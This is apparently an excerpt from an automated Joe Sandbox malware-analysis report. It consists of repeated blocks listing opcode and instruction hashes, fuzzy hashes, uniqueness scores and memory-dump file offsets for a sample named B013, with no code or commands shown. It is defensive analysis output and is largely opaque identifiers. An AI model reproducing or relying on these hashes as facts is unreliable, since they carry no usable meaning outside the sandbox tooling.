                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 51f18e478bbc5887e65896d230fcebdf6fba10a77b3ca391d71c3c2db5f73db3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cb1b514fbad1d35cb21f373869537d13b65356105857c54b5f267e42968b68c1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51f18e478bbc5887e65896d230fcebdf6fba10a77b3ca391d71c3c2db5f73db3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE31D1317402559FE720AF7890153BFBBE2AF88344F646868C64ADB389DF345945C7E2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9821d7874cd040ff7390ce44dcae21a40fa436be892d44ff986dec4d93e05e11
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d96ec72ea9d8c69c9c72fa8d869eb1ae74296dd2a9d703244b449b9ebc7e50ac
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9821d7874cd040ff7390ce44dcae21a40fa436be892d44ff986dec4d93e05e11
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F31A272A00245CBD714DF79D4606AE7BF2EFC9304B198169D015A739ADB34EC40CBE1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3116717b32ecb89d895649932ff3547b93b816a230b61aa4e99282c7b9eb5637
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ecea436c13735f3fe0576912d7efd93b7c832e0c1d28bf4ba570d5cf8388d9d0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3116717b32ecb89d895649932ff3547b93b816a230b61aa4e99282c7b9eb5637
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9431F076D29228EFCF05DFA9C940EEDBBB6BF48310F058065E509AB235C7719892DB00
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ba833803784abc0b017c3ed77214760c269e79e6cd9e55a373335fdad476aec4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 336c80536dc71bca9def2d1f8d0e5629fbef3697d3311288b7090963a83a7e80
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba833803784abc0b017c3ed77214760c269e79e6cd9e55a373335fdad476aec4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F021B675B14129EFCB10EF69D9805AEF7F6FFD4200B108568D41A9B350EB319D06C7A1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce446dd0c673551f7d1bee3b6a37d1882f824b3f73639ab19cc4732076ba76f7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b3c8cabc81f3e49aa6f5a24fc129c5fdab8b3fa0f917e5c03ce3d03d32348bf8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce446dd0c673551f7d1bee3b6a37d1882f824b3f73639ab19cc4732076ba76f7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B31E2B4E11219EFCF04DFA9E985ADDBBF1FB89310F208029E815A7340DB706D468B60
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8ef1f1a35f4328add6f410344f65c8054580aea070f5e6df9197ce826a160614
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 095f0ca5fce8df0ba2b5474b982826ceedabc61ad1f5e44aa818eae96a947212
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ef1f1a35f4328add6f410344f65c8054580aea070f5e6df9197ce826a160614
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD216031600306CBDF41CF69D520AAE37A6EB8468CF148159D948D7349EB39DA068BC2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313652885.0000000001D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D3D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d3d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f6bdbf86f3d9ebd603088ab272100b5eab51bb2124e9450cbaf7499a4e0559e4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5bce2d228f0b4ba1192747266ac31c3f2695e8460ed7064cb399f443aded8aca
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6bdbf86f3d9ebd603088ab272100b5eab51bb2124e9450cbaf7499a4e0559e4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4221F7B1504640EFDF069F94D9C4B26BFA6FBC8314F64C669E94D0A246C33AE416CBA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fd40d987911d1d36dd56188a19ccc31bb58eddda920f36fff3cdf9ce5cb0d313
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cab77e32a33cc44919e28dd1ab1a22976bf38ce2da7baa582e02b5206a1d101c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd40d987911d1d36dd56188a19ccc31bb58eddda920f36fff3cdf9ce5cb0d313
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21B2716002468BC754AF2CC85028AF7E2EFDA320F04C6BAD4099F356DA749846CBE0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313652885.0000000001D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D3D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d3d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c13cc5502e2b72a490574922911900b0d2f8ac82c141e8337b993c02a3e22ca
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ac665d61b9163761fdcb7de9622e30e9568ff55221eb5aa3d75966f8c3da31b2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c13cc5502e2b72a490574922911900b0d2f8ac82c141e8337b993c02a3e22ca
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 682148B1604600DFDB01DF58D9C0B56BF66FBD8324F64C56CD90A0B206C336E456CBA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d820ac0dc360760e95f337fb8ec099bd6c3da58d56eec888f3c9f4ccefa2aa30
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 77c10efbfbabb255c438f4a1333896de841bea81e0ebb5ed9919905a7076b8c0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d820ac0dc360760e95f337fb8ec099bd6c3da58d56eec888f3c9f4ccefa2aa30
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6831C2B4E11219EFCF04DFA9E995AEDBBF5FB89310F209429E805A7350DB7069428F50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ec995434fb7b3fee5c74cb612d3fad5614e683deb2d27da380bf825ab10b2b05
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c6899ad392e48e7df4bd3636912f8c0aa7ccf1c0bf47b39ad04b6bd9d18c85c7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec995434fb7b3fee5c74cb612d3fad5614e683deb2d27da380bf825ab10b2b05
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41111A70916208DBDB14DFA9D848AFDBBB9AB8E341F14B029E406B7399DB305810CB10
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 35ad58a6f7b479c444855bf140a9c094670a64de6a6f8700f274d8d416feb3f1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f7837eb7a68cf75170321ce1732e6180097a58a256e40caea3d83924005d100a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ad58a6f7b479c444855bf140a9c094670a64de6a6f8700f274d8d416feb3f1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE2190716002058FC710DF28C851289F7E2EFD5310B19C2BAD8099F396DA749C458B90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2313742813.0000000001D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D4D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1d4d000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 528e368d7208bbb61325ac613f195935e8bc5d0a8315be5ca2d41060e9eb9534
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9487b3a68f7b43d5e85e368be9fa77b89475684ca5104d88a442edee282db052
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 528e368d7208bbb61325ac613f195935e8bc5d0a8315be5ca2d41060e9eb9534
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB212271604600DFCB15DF98D9C4B26BBA2EBA8354F24C96DD84A0B342C33AD807CA61
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f0a1026f93896112899c8fd1ea3c6d1c34ec0566b1ebfe1b61a01d5818cc54be
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0dedd7f3c196f4bc411137b2ddd9c9eac9656c0dd97470f210c5cd75868bf2cb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0a1026f93896112899c8fd1ea3c6d1c34ec0566b1ebfe1b61a01d5818cc54be
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48112231B003559FD71A6778542817E7BEBEFC9240B0448AAED4ACB389DE24CD0787A2
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cf6e33a3fbe00bec880fabc475c3cc1aacbaae64407ea85a569fa4d677f18eab
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 12ecb845e725fbe08d3f3feb5f20a0f51a5a6bf12b77e6d299381bf433f774ee
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf6e33a3fbe00bec880fabc475c3cc1aacbaae64407ea85a569fa4d677f18eab
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14215C75E35209DBCF14CFA9D9446EDFBF6AF8A300F149029E809B7250DB709842CB50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 49a92052b069e7927973a6f39ba3859faf7c2e4bdef92ef12d6bac737bc34183
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd47756730324c3c46e459011c5316d013a9aad6a1c26e3e9e52d860ce7533dc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49a92052b069e7927973a6f39ba3859faf7c2e4bdef92ef12d6bac737bc34183
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95218B70201B409FE716CF28C4857697BE1FF81309F144A6DD1528F2A6C3B6E88ACB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6bdb119ddcc8d21dbf601f6a972cf361c1cf682b9c10ef106ce89607b8f767a2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 754836b1a265b5b9a3cda86c2bfb8e002db0de6f8f02ef3a518099d1b2eb23f7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bdb119ddcc8d21dbf601f6a972cf361c1cf682b9c10ef106ce89607b8f767a2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1216D716002068BD744EF2DC89028AF7E6FFD9324F14D679E8099F39ADA74AC458B90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2328998963.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Offset: 09290000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9290000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d1fb3e9a1ae77ddf4f8f5671a3d5b9acfa460d81f7f85d121a812ce0a0d4fcb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e252e99a69ef6504d7e19dfedc529a38c93d2f8499f4cb127ba4c26933ee4af7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d1fb3e9a1ae77ddf4f8f5671a3d5b9acfa460d81f7f85d121a812ce0a0d4fcb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F116A74E25218EFCF04DFA8E948AEDBBF8EB49310F10816AE814A7354D7709944CBA1
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a2490e68998888204d0c1f4a14f728018f916a63483a7f530192b378a57313a3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1cca49cc76401280e4aaa5d1dded4d5875a3e1c2896f48b49e38770ee4e99797
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2490e68998888204d0c1f4a14f728018f916a63483a7f530192b378a57313a3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB219C70200B40AFE716CF2CC0457597BE1FF81319F144A6DE1668F695C3B6E896CB90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1654c5e09f7803da9eed3aed6d838c3fb7ffae1fa5b4fd4baf1664ee35ba59e8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4d6aa66dc573cd3953df02c26f0e0469f29d93063e18a1d802831f40a4b3de0c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1654c5e09f7803da9eed3aed6d838c3fb7ffae1fa5b4fd4baf1664ee35ba59e8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72112874A05208DBDB14DFAAD848AFDBBF9EB8E341F14B025E50AB3399DB305810CB14
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 905df93e3b6dfde330422b606c3291bab62234e5f3be906b96c639d44d0f790c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aa9dbe5bd83404d46aa66b1ea656852fe40c31feab1583e385d02f2493cb7987
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 905df93e3b6dfde330422b606c3291bab62234e5f3be906b96c639d44d0f790c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A21C031A003069BDB01AF68C8503CAB371FFD9320F148679D9487B346EB75A885C790
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1e10000_B013.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 73059421b9df6988c172348e248802cbef0eda657ee341f9d7de27a93ea46c72
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c24c6bb677096771074e79be1f70f4aac25bd4bbcb1352231ea85b63bedbaf8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73059421b9df6988c172348e248802cbef0eda657ee341f9d7de27a93ea46c72
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 332158B6D003098FDB10DFAAD844ADEFBF5FB88321F14842AD919A7200C775A549CFA0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2314128654.0000000001E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E10000, based on PE: false
